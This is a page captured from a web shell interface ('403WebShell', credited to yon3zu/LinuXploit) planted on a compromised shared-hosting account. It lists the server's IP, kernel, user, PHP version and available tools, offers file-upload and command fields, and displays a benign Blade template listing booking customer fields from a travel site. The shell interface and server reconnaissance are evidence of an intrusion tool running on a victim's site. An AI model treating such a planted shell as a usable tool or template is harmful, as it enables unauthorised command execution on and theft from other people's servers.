Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.128.168.219
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/themes/Mytravel/Booking/frontend/booking/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/themes/Mytravel/Booking/frontend/booking/booking-customer-info.blade.php
<div class="pt-4 pb-5 px-5 border-bottom booking-review">
    <h5 id="scroll-description" class="font-size-21 font-weight-bold text-dark mb-2">
        {{ __("Your Information") }}
    </h5>
    <!-- Fact List -->
    <ul class="list-unstyled font-size-1 mb-0 font-size-16">
        <li class="info-first-name d-flex justify-content-between py-2">
            <div class="label">{{__('First name')}}</div>
            <div class="val">{{$booking->first_name}}</div>
        </li>
        <li class="info-last-name d-flex justify-content-between py-2">
            <div class="label">{{__('Last name')}}</div>
            <div class="val">{{$booking->last_name}}</div>
        </li>
        <li class="info-email d-flex justify-content-between py-2">
            <div class="label">{{__('Email')}}</div>
            <div class="val">{{$booking->email}}</div>
        </li>
        <li class="info-phone d-flex justify-content-between py-2">
            <div class="label">{{__('Phone')}}</div>
            <div class="val">{{$booking->phone}}</div>
        </li>
        <li class="info-address d-flex justify-content-between py-2">
            <div class="label">{{__('Address line 1')}}</div>
            <div class="val">{{$booking->address}}</div>
        </li>
        <li class="info-address2 d-flex justify-content-between py-2">
            <div class="label">{{__('Address line 2')}}</div>
            <div class="val">{{$booking->address2}}</div>
        </li>
        <li class="info-city d-flex justify-content-between py-2">
            <div class="label">{{__('City')}}</div>
            <div class="val">{{$booking->city}}</div>
        </li>
        <li class="info-state d-flex justify-content-between py-2">
            <div class="label">{{__('State/Province/Region')}}</div>
            <div class="val">{{$booking->state}}</div>
        </li>
        <li class="info-zip-code d-flex justify-content-between py-2">
            <div class="label">{{__('ZIP code/Postal code')}}</div>
            <div class="val">{{$booking->zip_code}}</div>
        </li>
        <li class="info-country d-flex justify-content-between py-2">
            <div class="label">{{__('Country')}}</div>
            <div class="val">{{get_country_name($booking->country)}}</div>
        </li>
        <li class="info-notes d-flex justify-content-between py-2">
            <div class="label">{{__('Special Requirements')}}</div>
            <div class="val">{{$booking->customer_notes}}</div>
        </li>
    </ul>
    <!-- End Fact List -->
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit